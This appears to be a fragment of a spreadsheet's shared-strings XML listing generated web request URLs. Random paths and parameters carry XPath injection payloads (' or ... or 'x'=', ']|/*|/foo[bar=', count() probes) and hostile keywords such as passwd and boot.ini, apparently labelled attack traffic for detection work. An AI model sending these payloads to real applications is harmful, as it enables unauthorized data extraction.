    <t>/xzxpopenxuq/cah8e/thelgrfm/abprj1x-0q@euif73e/d5pg1i4hmutu_cdbs/h6ic7etssa/ofr8zf-vkfob/t5sgvwp.nsf?unigrtsatpno=7025+++or++wt/var/yntah/child::node()[position()=59]+++++or++0283=&amp;45r3o0l=+cb1aco</t>
  </si>
  <si>
    <t>/qbztp5phyifoy.l/ouiilptnmeeutegel9d/mnaduheh5ratnuet/ttaaaihnichltfdlnt/53sk71_@umrqnyx5a/s7bux/e0rjhe/stieeh/6idbscripttpopaz8po/oc5p_eaz/bm2qswkrefstmaeuv/htm.css?txlh4sar5grs=~telnet&amp;drairer=o-q\\yogorolib&amp;naanehoete4nsaa=p&amp;lneaigysmneh=828&amp;ysvq=itvwbjzzond&amp;s0eossugjfc=tzc0ne'+or++++1&lt;+++++nsdlz/eujti/ohgefn/child::text()[position()=047]+or+++++'gpnilr'++++=++'&amp;sbsfc5=iicam&amp;beus=-uz&amp;uwnt=n�h;rsh&amp;eepiosi=230771&amp;lptaunae833=onas5qz&amp;wiseehl9eo=30&amp;nrnpnhob3ghntce=78313&amp;l2n=onocouq6v70iiva</t>
  </si>
  <si>
    <t>/40d.-8hf2lpt_byjxj/ans/sbsrs/hhfwei7fonaterkry/tdtnhd1hnvssgi/iarmvmyrfersnosse/iltenh/af5dwztfvpxz5rw_/s9uuhl/6rrpvkujbqqthf3_-lgs.bin?6wmt29_q=mu4hiudvsu&amp;asrne=rsa&amp;tlntseaucnisd=4527199978&amp;kttysngknwr2ijc=(i+&lt;++++count(tiile/child::text())+and+++j+++&lt;+++count(i6eehe/child::comment())+++++and+++k++++&lt;+++++count(hnalei/child::*)++)&amp;itjdaeddylmnxs=iz4nlh1niz)l&amp;5puz=ymroie11sed&amp;ebdfeiva2t4lsko=178&amp;nwntrjncrusneih=9428493</t>
  </si>
  <si>
    <t>/s9rst7gaxg/6hfocozstgp/amets3epeyntbio2anr.nsf?tseesane=ltaaaj1peeeh72tof&amp;union-uugnmeifhw=ob&amp;taolamelthgae=tko1&amp;mntneshiotr=ho4e8'+++or++abdstu/ssyi7/child::node()[processing-instruction()=787]+++or+++++'stat'++=++++'&amp;ozqppznullstylec=hqcei85tot8s0nr&amp;0ayi0e9aknelg1=w&amp;ie6wt2waua8o=50450897&amp;ee865ei=2937&amp;itq=esseroo0aa&amp;ms2uosx6bcauwx=@5lbs&amp;es=757&amp;lheyn9nleye=sercat&amp;hogame=poyfxdid4jqbenyt</t>
  </si>
  <si>
    <t>/1heahsohntj.php4?0oexammqfvoq=i&amp;iatyerob=hbaisse1&amp;nd_aqpv9or=etrue+seztu&amp;mmepansotvrda=o3rh'+++or++++(i+++++&lt;++++count(sahmrs/child::text())++and+j+++++&lt;++count(lte0c/child::comment())++++and+k++&lt;+count(st/child::*)+++)+++or+++++'om84sc0'+++=+'+++++egr'+++or&amp;tttc62seg=ree1ndci3et3c&amp;uceeptlnnahue=05143343&amp;bstep=31&amp;e1=984534&amp;debalxeiealehk=n)oinclude&amp;eadntsjxytesh=le'</t>
  </si>
  <si>
    <t>/qg08dsesi8ihqzuim/yerosbemstnqe/anzs6ajoz/benaoeuy/vzxgxc/bhigse/1jtfcpnp/iucaeotflrh/3efl.69ks/dfhwpeunpvqgdd.i/cotrnlmrou.gif?utqarytphnlmh=dp'+++++or++++path/child::node()[position()=n]+or+++'eami'+=++++'&amp;3f7vi5xwinclude=owe7il7afn&amp;bins81oc=y2</t>
  </si>
  <si>
    <t>/d3hycar/6062/iuc/xnisonzy/ld8tsk/h@vmekuv/ta5@e1aja/almk/anxnl9t0-daqdl6zji/zasgi/n2qttwzuqga5u.asp?obven=45723++++or+++nateis/a/rieii/child::node()[position()=1]+or++9=&amp;lrhltfeirlor=lisernonf3ni</t>
  </si>
  <si>
    <t>/hieoye2rtr/svh@/ezooft4znbh6fyiviz6/2r/hishgsei1/hyhrsje32e/deds7dlene7ibd.tiff?ooeo=71+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++++or+++535=</t>
  </si>
  <si>
    <t>/sgyc/hq6epfjxnzeegzihdcb/dtmg/1xchildu9i.php4?5qmxdma=8670&amp;au8we=9nj&amp;n1=/positionpeo&amp;etgen9=t89m2|5wanddiinputr&lt;hpl&amp;hzrqftnmhyatuh=ralipnras6sttzi6&amp;kre=szv5edm&amp;aytg7=oplexec&amp;iddn1cwcytmth=fopositionher9&amp;sfmyhieoe2cr=tsstndfy'+or++path/child::node()[position()=n]+++or++++'uanw'++=+++'&amp;gjiavhxnteisb=phk0i&amp;onl=29455025&amp;rvg=+arsi?</t>
  </si>
  <si>
    <t>/vp/hdoslfoa36t1ln/fwindow.openz4wnujms_pxf/hpvik-mrdnqpm_vr/ngfrs/fij/_-bplike@tvbscriptftdrophfa/huywas3glwspvt/tnu77anrb2vycrnl/rawncrn/7bvfklohhu1aiethae.htm?ki6w7agl_qcf=tliframeab&amp;evsiariwtah=55177+++++or++++1&lt;+++++ktuecz/li9/fdn/child::text()[position()=72]+or++40=']+|+/*+|+/foo[bar='&amp;r3bn8fim=tphpi&amp;rlaqwltsgtetoa=1jr4l@4c&amp;wwethbr=ytdadfaatuhnmefntp&amp;lmav6etbaifd=12207808&amp;s35bn=naisawz3&amp;scriptl77tpsjrbo=1&amp;p4e=nwo&amp;xhc0yj_oa=7&amp;yjr9=diecsfvnpess&amp;r5e=23&amp;mueaedonoiscsoi=hrui</t>
  </si>
  <si>
    <t>/2xd1mxmso3mevefvpn/cfmjfioiwy6hrj/plinka/ieesrm/druae1xdhrt/az74akkv_gxcizaf2/beb.pl?bu66b2cmdc=inputprocessing-instruction1tbc&amp;7shomejm_betweenlinkoax=tx2mv7hupoi&amp;rna4ittsrt=n570hcgleeae3ihh&amp;ffsd=chaithojer&amp;xqi2y0yjac=/[&amp;ikotu9r=t9dt.i&amp;ti=0+or+++1&lt;+eix/ta/ilasye/child::text()[position()=440]+or+345=']+|+/*+|+/foo[bar='&amp;6ssta6eaf4w=airkw|eiyxcx&amp;igcbemeesnrnelr=%elikeservicesccmeu&amp;zkhgo=2667857</t>
  </si>
  <si>
    <t>/fo/wgq./ssco1/pa/eydleze/n23/ypzzwwh6w2s/uehqwi1w/usc_4/0ueod9r/replaceplm3mlhbcddivscript.bin?pximgblg1r=zacsodo&amp;setormbhoaao=hcenduxec&amp;ho=epi&amp;gtn0t7e=ee0b&amp;bxvn=cpm@cdeeg&amp;co2okikaio0s=oyby~d&amp;uhr=uoars']++|++++p+++++|++//user[+++++name/text(++++)=+'oe2e&amp;ihso6le1bohhvz8=arwe&amp;iisiia=el'di'mncdeeesshutdownh3&amp;mo=22937&amp;mjhms=lte3isetntyucu&amp;ihsndkgppee9oo=sqgm&amp;cxp_oysx=e&amp;&amp;echote9q=efco6h&amp;lh=eneehensiyb</t>
  </si>
  <si>
    <t>/bhn/tha255/oofu2mvrb/tktvswgd.exe?iablo5rhheyir=0dsfyvsetyd&amp;hf4e=tggao6fx90&amp;lhezd5r70eerg=stswr/lformiplto++stdin/n&amp;oltaalgnt7o=ssofl&amp;oa4e45=1noylyu@fsame&amp;thaugasa=741+++++or++++trjral/n5/wte/child::node()[position()=24]+or+48599=&amp;gdtjpo=6140064&amp;4bka6xml3m=ee~psdi&amp;vakxvbcvboot.inis=791</t>
  </si>
  <si>
    <t>/nltw0l2ctea/nqh.2j3yvbcmd5tb1/x_/rgquy4e5wkelkr5a@cp/pb/g_gkkzvy1dqcao1kg/pnekesezh/ni1gfm8bc.asmx?ievtyntqsenso=ndrobyehhptohex9eq&amp;he=5&amp;swp-y7xp=5084&amp;ai4p5mdhomej=uqxxtwvvbs3x&amp;pcj=9008&amp;bi=io-gtoaj9b_.&amp;eaei=ne0x&amp;w1a7002setae=o+eanhs&amp;da=eao'++++or+++0amee/gyg/child::node()[processing-instruction()=013]+or+++++'ligmoz'++++=+'</t>
  </si>
  <si>
    <t>/tasie5taxtsa9rvnfcyk/olpoedqvca0u7isej6_/rhiswmzelekcnltoihi/ng/jeo5mtc.png?rnbp=54&amp;caeeatsan0iar=rajarwd&amp;e2mnlnhrr=eaeextt1rcmotifs&amp;rhrte=16875103&amp;gqjh5=sa3jiztge(8rr&amp;xrenr=8376&amp;xptrt6iu0=leeu'+or+b/eoi/child::node()[processing-instruction()=516]++or+++'thrht6ft'+++=++++'&amp;cm7kamffwoptyiframe=14535061&amp;csosw8tw7=t-iaea?t91nh+&amp;isdugw6ihrcer=vio&amp;1anrtie6xhoeala=382200</t>
  </si>
  <si>
    <t>/lsy9voeu/my10-4gwyt/nebtnc-h/x0u7/4-rh-6s9jh/s19tqx5_tuh5/etzw@lt_n/snz45iza@a.js?lsst=4187137&amp;weedfsasuttqc=87&amp;ncttn4gx=61537457&amp;ap1nme=gaingn7tn9&amp;rtfderacn=ha&amp;etselhz4tlltees=50241&amp;eaacmduc7olh5i=se3vivbztsx&amp;script0sgqxxvdwindow.open=prcdp/esrdmx/m9ev/child::node()[++position()=14]++++|+++++enm/v8r/ynnee3/child::text()[position()=72]++or+'olnsdae'+=+++'&amp;ruuhn=1d+)(5meose&amp;akto0him=240455921&amp;muety6e=erno&amp;rse=s2e+erq?ska&amp;ofxeldegr6w=tn3if&amp;feidsa=io3t</t>
  </si>
  <si>
    <t>/eu8ti/oldkr1beeshtuoridf/elhdodulnnmsoqtcenbt/e3tyuuxm3/y@2ro.jpg?2slrhnss=4&amp;osrtwd6=6736994&amp;2b98tizoethoeog=w2d7yy7d9ia&amp;ro=qrehci'++++or+++1&lt;+++++emaet/uq/ne/child::text()[position()=404]+++++or+++'s6e'+='</t>
  </si>
  <si>
    <t>/sbblim/8ficmsemr0/rnrdehtcgs.html?yiaiitevoje0act=msnrawgetiwinnt&amp;etvaa3h1uyhsid=dto'++or+++path/child::node()[position()=n]+++++or+++++'iiam'+++=+'&amp;aatuqnuoz=uemsdlib</t>
  </si>
  <si>
    <t>/yp5lpscriptgbwlinkr/4uhte3zvsnzgxqoxdh/p5xvk7h/gxelzkcyah0i27ni7/1.ffxjo/eo/rosle/aujboot.inissock_stream/stqiyw6wqf/w3wgetpchildxjn@fv0h2t/r28if1/_lsvn.mdb?mslntcsmohmaaxr=sgtn&amp;45g_=p6tp0srlt3sortaj0&amp;olmmoeanen5jet=22649&amp;sorsso3aerc2=seonu&amp;o2sefenk94=ecll+de\\c2o&amp;srauitswuteqt7=43&amp;connectcki7imom=ycse.xk7p.&amp;n7703=+j6mbonndeftp&amp;&amp;qatani=e0kmokc_h@d9&amp;8undh5zsbgs=uc3behse'+++++or++path/child::node()[position()=n]+++or+'iapho'+++=++'</t>
  </si>
  <si>
    <t>/edo/ekxgzwse/eqpotttsitdine5sn/orsa7dt/tzul65.html?7erhg=3065+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++path/child::*()[position()=(k+1)])=1++or+++++0344=&amp;oni5es=iaadlsoczse&amp;oetr3aemos2ts=21694&amp;g3y@xyxpsusx7=mufigee8&amp;ntcu8ro1x=lh78eroaa&amp;16=ieraualesamtweyr&amp;mtafnhn=2&amp;ewn6iflikedq=aamecisdtr&amp;pexecjv69hg7=l6tacnowaohsa&amp;jd7co=784</t>
  </si>
  <si>
    <t>/or3/dtfddesmag9du/rs/iv/add2mcow/erj.swf?ec4aohii3srf=69+or++++1&lt;++++q4c/tmauh/gwoih/child::text()[position()=97]+or+36302=']+|+/*+|+/foo[bar='&amp;.hoz6ftplpttzx=jinanosejccepoo</t>
  </si>
  <si>
    <t>/txdd5xw@b/ewekthv5ae2e0ye8er/u7lmfappusuevoe/pe0iitnqeles.tiff?jcfce=rbfwzpcjmchd&amp;eiu=en0ndperl:latn&amp;ien7elrt=zwqkwhymzser&amp;ho=o&amp;re=6374&amp;p0liee=copy)c&amp;rledehmnrej=j/pao1/sels/child::node()[position()=657]+++++or+'7vilhbrl'+++='&amp;mipie=7961432&amp;fny=tmetaes&amp;eethro7eoeon6ga=5827238&amp;tren2yryseg=ac+tbhtstylehttm&amp;5m2=linkgaccess_log&amp;ce1nhrsuad7=2&amp;nuqteicetzc=inputhf9mz</t>
  </si>
  <si>
    <t>/eiqqf5ozcye.m8k/ypad/cg_fnbgmwrswd._ril1g/cfbxwb4.jpg?threpepw=59793&amp;eiboevesat=hlpx&amp;0ex0ridghl=/noernenqnull&gt;r+tc&amp;n2swien9nb4gc=httpdi+tfd6fpebhdo&amp;seaec=66927041&amp;upe7gsptlf=411838&amp;smncemsh=eeafgib;&lt;&amp;esrolattshnaib=lh&amp;oe4processing-instructionykaxrkz=mlhono&amp;iggstsoun=nh0&amp;ijisqiatnet=5&amp;faeov5tannh=passwd&amp;a4ete=98389++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1++++or++0530=&amp;esndoeax6ss=11</t>
  </si>
  <si>
    <t>/s4abeiie5exk/thl/2tse7flirmhan0io8eds/iwce/processing-instructionkam3akioxbxp/dss/w-fo-ogn-k_n_fa2.exe?ft7slkoret=63763+++or+++1&lt;++dtm/amxtlo/0ouia/child::text()[position()=01]++or++++67417=']+|+/*+|+/foo[bar='&amp;aoeedowtgre=11677908&amp;neo=379228&amp;olr=coyixechoaiid4gh&amp;i6o6dteit=02111&amp;traujhs=ti2nd&amp;4i=7981&amp;oeigcl1ds=iwp-iupdate</t>
  </si>
  <si>
    <t>/ue/o.-_vcasib9k@ujfky/z3al0x7k1/i-pcaia-nrxc7a/r7ehob3ps/a1@f/epasswdphpxl.vxmlexmlr8/txbet1u.html?h4obeee=iegwol'+++or+++++sufez/hw/child::node()[processing-instruction()=5]+++or+++++'ds'=+'</t>
  </si>
  <si>
    <t>/-1jbzstdinkwlf1a82w/ero.css?ldnue=betweenr+&amp;reloemico=kttanht'++or+++count(++path/child::node()[position(+)=((i++++j++++++k+++++l++++1)]+++|+++++path/child::*()[position()=(k+1)])=1+or++++'sn'++++=++'+++++tamna'+++++or&amp;tlri2r1p=oix0s0ahaii4deihn&amp;ox3sxn=shfteeatsc&amp;ebsfinl5du=aeesn8k03ffiee&amp;odn=eutosethttpshtpasssre&amp;heci3aeobpcee=~(+t&amp;jl-boot.init.vhuv=ydlobbersham5sizs&amp;g7dozqk8uw8z=ero8\\sf2&amp;sal1ee=29&amp;oe=deewl</t>
  </si>
  <si>
    <t>/bbydogt/hqi_8m1iq/reph3szt/tirvimg4row6bwnt3/bhdneid/s5cbnoxeu_xlwwhiuj.sh?ygixvkm=(i+++++&lt;+++count(acn/child::text())+++++and+j++&lt;++++count(xetxlo/child::comment())+++and++k++++&lt;++++count(obdj/child::*)++++)&amp;kkycx=cmdbsock_streamfromna45rtrneameta&amp;wiz@gve6=515&amp;ahminiitnth=7&amp;8nlaelwshl=t(d8+&amp;gacdht=4759&amp;kovxh5ji5dklib=a)k[&amp;mml=aktitwp&amp;mocha8c0_=statiaw&amp;9ssxfh=7n2s&amp;l4eval4=ija</t>
  </si>
  <si>
    <t>/9fhttphometlw@-dt40w/jwlmmwlbkkzy7/ssxc5eghwwedznncb.htm?h8lsaneoi=bnehzjadoe&amp;ybkriwretzpsahj=676905&amp;chuaftirhdaa=7667&amp;o5eimu=rltlrnos'+++++or+++++fw6a/2aah/child::node()[processing-instruction()=288]++or+++'issnn75'=+'&amp;1lnut78s=aieihogqpuid+&amp;maoa5are7lcame=e+;&amp;ndnwrquat=h2st0gl1n&amp;1otu8za9dcelhy=fni0lhr4d&amp;qefbexecrm@ngp=de~f</t>
  </si>
  <si>
    <t>/esv_f5u-/mxt2oohs.asp?bj0fkirhome=ctds7t&lt;gioaanea@&amp;execa0i5accept=window.openid]ee0logri&amp;essh=hs23rtelistthdm&amp;cnoatinshwh=4300&amp;seestlteam=uolreds8oysdcu&amp;fc=4&amp;9nrtofehdtbsril=lwnmgs&amp;oxybdg8tvemochagroupby=77050&amp;emsmr8h=dl.hb45&amp;ttb0endl=ssrnieduengi&lt;b&amp;elznda2msiihfzm=ents&amp;nknuuuo4=6+++or+++3/espm/mjceot/child::node()[position()=856]++++or+8=&amp;8mrnsevoloesn=7r5ani&amp;rnngeisuri=ida4hgroup+byaqt+e</t>
  </si>
  <si>
    <t>/belj2antwrac/mpqv0l@f/dniacnniedetrne/ctitaaihgrcenuo.jpeg?4p4t=ari)&amp;yiatao=fopen&amp;iyt=&amp;3dpassthrus6'xbij&amp;ti=1311&amp;rygvd7k=(i++&lt;+++count(uca/child::text())+and++j++&lt;+++count(3hot/child::comment())++++and++k+++++&lt;++++count(oys8t9/child::*)++)&amp;s4zg4insert0=3ig8anntoon&amp;j9nutml7z=726&amp;lsticom5uz=73249</t>
  </si>
  <si>
    <t>/odhdeaneagaatuh9i/nxhcero_j7h/fc.bk/ltiulnserhh.aspx?gtfua=rme'+++or++count(++path/child::node()[position(++++)=((+++i+++j++++++k++++++l++++++1)]++++|+++++path/child::*()[position()=(k+1)])=1++++or+'sb'=++++'+++++os'+or&amp;tia=4dzvawstea++&amp;ea&amp;at4so9ctpc=i0]rewe</t>
  </si>
  <si>
    <t>/5ehe2defheitreupe.php?strso=72824404&amp;l7hnteinr=089++++or+++3ioas/eb/bcath/child::node()[position()=12]++or++96=</t>
  </si>
  <si>
    <t>/6h_4divb2c7rcpo/ehta/rs0ema4otie.pl?9te=njehy/e&amp;7emailcmyg29gf=n+h)&amp;0eoseite5=olsf/te/orafee/child::node()[position()=9]++++or+++++'wo'+++=++'&amp;liyxtl4ood5na3v=189876&amp;zldmrvwptdiexeo=seuz8orenng&amp;btjrdsvjh=goaseotnboihtriree&amp;6gtadmin5ujj=e9ezac&amp;qn@x=ga4ucerlw03htil&amp;nbbs6i=l8snwe</t>
  </si>
  <si>
    <t>/dugvmfzlbop_z/hczkc/11gltorncsowyeee1/h0x7jpd-kuj0ek/qroayajwwggb.wel/gmdomnrsjsadha4eeeo/g@y6nce3cq7f3ieqeyz/hh44egr67ttatoztu/x8/m1yq.xmqnh.php3?nmon=):hensavbscriptochttpa+htaccesbb+@scriptt&amp;r8irtgtin3zhai=80741224&amp;tnh=eex&amp;ruhp8a=xsble'+or+++(i+&lt;++++count(tt/child::text())++and+++j++++&lt;+count(totj/child::comment())+and++++k++++&lt;+++++count(r5r0h/child::*)++++)+++++or++'erete8ee'+=+++'+vc'++++or&amp;zcdi=4hbotce&amp;rnott8ntlde=oji2nehhmtde&amp;eiii6usftwdr5re=wesrn]latcg+&amp;etose4f2mndodom=qh7va1iatnr&amp;trmlahp9ameo=sn+a8lozretotmp&amp;hyl=724942&amp;c7zaw2e=tht&amp;qh1vny=/uldc3e</t>
  </si>
  <si>
    <t>/low7-w4gti0vx1_z/sk1keetmnw/h353r7shrtubeih6/cia_ehbpb8nup.ccjd/otle5/nmrhxr.seth8el/aou2clul89x/hrmht6/u8aeeigasetuteniidoe/a60nreeo/elliajuhlbechret/ajnitbontwstolmaygi.swf?lslkth=basa'++++or+++++(i++++&lt;+count(drsvt/child::text())++++and++j++&lt;++++count(tcrie/child::comment())+++++and++++k+++&lt;+++count(eet/child::*)++++)++++or++'eer'+++=+++'++4sug'+++++or&amp;s92peaioiheu=saahh&amp;ecisl81=570</t>
  </si>
  <si>
    <t>/jzb-x01/boadmqa05ener45r/nqvqtlrj/6emnesnte8atel5ha0ab/ee8/torpefe7ooidnsmifdb/ovttkj9cwhu99yz/m7_p/9s4itioluirt2l/4_c3l/oyxwxvt@dg58xf7-l.asp?eiahwcnee0uytr=83+or+++1&lt;++pt/a/ld/child::text()[position()=4]++or+++757=']+|+/*+|+/foo[bar='&amp;7b4h1=6415&amp;1tlq=eewms5u</t>
  </si>
  <si>
    <t>/p5d.u3fowm/ngic6s03/otxnrmeajttor5h9e9/2ttrttpjjwrrtbianoes/oofs/0yfwnrlious7zckfbf/si9331zbjce.6sibt/d7l.shtml?sgpheyhh=evlu&amp;1tfpep=nt'+++++or++++(i++++&lt;++count(en/child::text())+++and+++j+&lt;+count(d0/child::comment())+and+++k++++&lt;++++count(rre/child::*)+++++)+++or++++'ueafeaiz'+=+'++r6ieinl'++or&amp;qdakx6uxdivy=ed1.1&amp;-0hpat=3950482798&amp;oohwym50nse=eomfeclneafqfrsa&amp;aevhalra=dte%scixp_cienauped&amp;njnettce2eoofr=navybc&amp;rwssea=0ais7radminaoseuperli&amp;hc3e2gn5r8nnre=aldpilinkh&amp;wycn.bphip-0=09211&amp;japiplae=165413&amp;tguwsoltt=usn</t>
  </si>
  <si>
    <t>/soss/egtennefl/8bkd/rouaw6arussie/r@hnduuniond0_pcdjg/uot.jpg?sxh7dkxbnetcatwinntu0=tb0ynaeea&amp;owgsumebete=&gt;r9tp&amp;rswi=a/iqn/s7mkt/child::node()[position()=694]+++or++++'as'+++=+++'</t>
  </si>
  <si>
    <t>/hm/jkqfhgohnl_uc8.p6/nsipbrled/e4me6elrhianttttt/wobjectr/n_6k2ryjfjwdntc4nvai/thx2tszee6iexgdkjiw/wm2.mspx?uepdd=907542&amp;reogtheq=o&amp;derrnss6rgtnet=140262&amp;g3-4r=3898+or++++e/aim/ttd8/child::node()[position()=1]+or+0=&amp;grpgooseyso1ld=8773971536&amp;2xjhodq=d&amp;aethodilt=oee;\\t2t&lt;7ppec&amp;oe8=tui;in:</t>
  </si>
  <si>
    <t>/byn0kn.cfm?noshwonesd=egattsdiknxaor&amp;en=sto~&amp;fwtlhgtmvb6tgv=sc845ghu&amp;tepeerwteoet1=er&amp;ee=njox&amp;lto8tpt=o7vn319lmenh&amp;debwserlftmbezy=re@&gt;x+&amp;a2eeahehw=rfiodistne&amp;enaupmt=bhptgfhmhiahghe0u&amp;rcebzidao=ostiel'+or+++++is9/c/child::node()[processing-instruction()=871]+or+++'etehnrtd'++++=++++'&amp;window.open7qt=torlsfr&amp;ainieeb=iydanqtabryueidest&amp;hpsbsercrseosh=ien5saaipr8wn&amp;yagenpgunrtete=u(:e?gte&lt;et&amp;huetlnyieadirke=l+bn</t>
  </si>
  <si>
    <t>/likee/pl-1c/or/dheondueqssh/ssoptef0yw/exiee.bin?ppe5fhedpe=neihtsil&amp;yose8adllhdp0=70&amp;ltashhsddohsvs=+escriptl&amp;rnourtfe=80++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+++++8219=&amp;tesmabrwni2t=rw&amp;mua3ro3atumulm=o&amp;heatieeieo=1jeducsz</t>
  </si>
  <si>
    <t>/ooet8ahehfstwgae/c6jokf@evvwabb1d.exe?brs1ehwiai2=61++++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1++or++817=</t>
  </si>
  <si>
    <t>/vedftnci1k/j3vs_.-cpcho.php4?hn6=wiov1yxyu&amp;a9eo=51&amp;3s6aig=oyn9e'+++or+++count(+path/child::node()[position(+)=((+++i++++j++++++++k+++l+++++1)]+|++path/child::*()[position()=(k+1)])=1+++or+'2oisc'=+'+an2mt'+++++or&amp;6poc6kp2mocha=9&amp;nwiecanrr4e856i=78328&amp;ev=5648840&amp;9ny8tteoaydynd=6lbwmxsoefoaae8pp&amp;hne=rbw</t>
  </si>
  <si>
    <t>/5yf1np/ntsiil/u59sz3r1/hkaerseeia3tdre0att/tk9j/ti2._d5hsx9m/w1h1sojcreplaceq@/sathmb-ly5s34dyyl0eo/byc/eljhibetoegoci/eseyneg/oe1jih.jpg?swscbsplksrnaaa=itin&amp;ypsvv1=mseghocochtectt&amp;qsnsnedwebp5d=6metadvc$&amp;iuihlnut3=isl8etnelheasi&amp;lol3a=t4f9wa6gu&amp;thw2=ro&lt;1io|evo&amp;ado78y_6=ms3kwhcb&amp;zsds0hevts5lwi=idleao&amp;i8ae1oe=000++or+++++ds/tb7c6/keo/child::node()[position()=4]+++++or+++24156=</t>
  </si>
  <si>
    <t>/xtchlqtberee/uroeameibaap/fejt6tt/pwa7k33.cfm?neis5wjyionaz=libciframeaccepta&lt;&amp;evweafsdnmi2v=7099998552&amp;ns0e=2++or+4hh/rah/tb/child::node()[position()=3]+++or+++++79=</t>
  </si>
  <si>
    <t>/ttreaqw8.dll?f8ps0dcwjsp=pi0/9rcn/du1/child::node()[++++position()=174]+|+++7desre/7uo/ckzes/child::text()[position()=443]+++++or++'m8m'=++++'</t>
  </si>
  <si>
    <t>/is3b7kohdbeymsxe/sw/tl/oiptorloamlb/ou1ndw/gtrsab/eaeta/loerfhrano2u.html?aphtdaswejh=om+lt&amp;debvbscript@fi=]dsls&amp;lrtlrrez=ulmqn&amp;tytoqleiroacsv=99&amp;nriay=ee'+++++or+6+++&lt;++++count(path/child::*)+or+++++'rntyam'++='&amp;riskeocliuef=)yeye-eae|ffodlxmlj</t>
  </si>
  <si>
    <t>/nm/eur4q0gjl2um9lr/8skcxqxnksf1ko7et/j.replaceswka/3ybjqs8w8mawxf/eo4pp/l1tygetiwcojawhrf2x.htm?hfestd=x/0bea/h/child::node()[+++position()=8]+|+ea/g/druoeg/child::text()[position()=326]+++or+'iitioot'='&amp;lrnullmuxvad=ytaktb&amp;oe=oynt0</t>
  </si>
  <si>
    <t>/veplet6.png?tsarotrani=xtermobjectk&amp;mirodlt=etaia'++++or++++path/child::node()[position()=n]+++or+++'gtpegia'+++='</t>
  </si>
  <si>
    <t>/vasiee/5i/dr0cp@okpuyvogzhoc/wt.tiff?bn3w8zoselect6nc=17811074&amp;tstuqfxrt4=nyskerwyobay&amp;qioc6nanactyt=nyrecmin6ti&amp;g7vcl4t5mo3mj=iitce&amp;sarche=651&amp;ahy1runkdztewbi=7&amp;cd=50026&amp;nhdaljae=es&amp;rrncyineseatepu=evalturn6etcereplacen&amp;eztli0=atm'++or+++1&lt;+++++aotst/n/dla/child::text()[position()=9]+++or++++'fae'+++=++'&amp;nysbk68gx=te&amp;oseneuhxrtid=9</t>
  </si>
  <si>
    <t>/jmm05tnqbphh/xdz/ta2esxrsaoeteyaoo/pq/8cgyev@/e5/ev0p3cuy0@oq2i8.u/.zf/jj7v.i5f/wpri.uhzbrd4nsn@/0o/onaaetzce.mspx?unvh4tarpvgmyol=6&amp;ai0iar2yrah=ncss/ap/h/child::node()[++++position()=9]+++|++tb/ykf/8nn2/child::text()[position()=9]+++or+++++'nhyyq4k'+++=++'&amp;8cco6ftmpqq=yagv</t>
  </si>
  <si>
    <t>/danf77nvpj/iq/c-fb@bmvwdgrvlbpv2i/se.js?9ttutrlsz=1925436&amp;ttehk=dlr'+++++or+++++ea9/ott/child::node()[processing-instruction()=6]++++or+'aimte'=++'&amp;aitioiso1yya=iy&amp;ph=heesrt&amp;tltlsgntiear=nrew+f&amp;@pssjnj983p=3</t>
  </si>
  <si>
    <t>/n10m99@05yuweurpw/aukfmuofzbmq8@rn/ih5/1nt4oorlpecti/iuajh7uecaaoagx/mexutg9w8h41okd/ua5ihsadnrtdn0os.nsf?iteki=7?&gt;h?%u%3r&amp;gwts=swzcinexecinos&gt;an&amp;4h8rio=fdjd0fe&amp;erbtltiebxxex=6631&amp;enaehtltggaotrs=hahn3yzx&amp;atenb=s&amp;6bfsb3vhavingr=jlr48iseb&amp;loexecbt=rost93njrit|d&amp;dwruleresu=p&gt;&amp;eccoxbyv=ier'++++or++(i+&lt;+count(utdn/child::text())+++++and++j+++++&lt;+++count(ttd/child::comment())+++and++k+++++&lt;+++count(aoii8/child::*)+++++)+++++or+++'rtzh'+++=+++'++b1mw6i'+or&amp;u1okroepa=207&amp;nsa=h9a&amp;7trophlnhesh0e=sroctnr</t>
  </si>
  <si>
    <t>/see6@/eppeabl3rnek/pctawhv13.2/dmalu8tov3omjb/e8n1t6pao/ooteejd/hvbjx9uujzsgvsyvwayd/e@3r_6m.k/s4fzk@k9zyapesre/n5ucei3enceaetd1.css?iaktbegamia9set=aepp&amp;8nitrrio=meemnbls0atn8y&amp;odejtriatisqiol=9g1te&amp;jrbnrcoxcruoa=y(&amp;etg74xrtly7yd2t=wiceq&amp;nan=admzcycmdjoj&amp;xqnt=st]e5ayfhras&amp;6ia8euidankqeoo=nsssbetweenthf+0+u&amp;d1ko6=s\\;r&amp;renm=9537787&amp;2mv_jxobtz1=(i++&lt;+count(oa9/child::text())++++and+++j++++&lt;++count(zeme/child::comment())+and++k+&lt;+count(s8apt/child::*)++++)&amp;c_ub9access_log-fxzpn=aenfaccept</t>
  </si>
  <si>
    <t>/it/lnrbcsl8zd/rmywllocationcaselect@cur/iogjfcig2k.cavb3lt/okq.php4?ep=dh:&amp;xp_krphpxs=anhx/rek/bly/child::node()[position()=717]+or++++'rcfet'+=++++'&amp;sdpnsuqs=e</t>
  </si>
  <si>
    <t>/ych2-cjgtwc.9/i7gldatonzta5/usiyobkksslwg8wo/enc7fu-1divae53/nsc.dll?onou=n/lnn/pesi/child::node()[+position()=897]+++++|+oriaic/t/erala/child::text()[position()=1]++++or++++'qaa'+++=++'&amp;nirorlwtksn=2546217</t>
  </si>
  <si>
    <t>/ymruhsoixpc8supsv/nnodc@q/exoe1hpa/uqiinres/7groupbypj1lhx/cwzwhyikrmidnvixdlom.swf?elbob=sidp'+++or+++++count(++path/child::node()[position(++++)=((i+++++j+++++k++++++++l++1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or+++++'nuciaa'+=+'++ds1nt'+++or&amp;oosde2w5tir=:t&amp;s7lroentit=386047&amp;ataoneneriosiu=%</t>
  </si>
  <si>
    <t>/nt5u2/ix0@nelp/ildxo_zsdk4z94/e_em9xarxf3nbxh.css?znph-oht8tmu=ue6thaff&amp;tlnideinsfe=rej8e'++++or+count(++++path/child::node()[position(++++)=((++++i++j++++k+++l+++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or+'aai'++++=++++'+aexeqo'+++or</t>
  </si>
  <si>
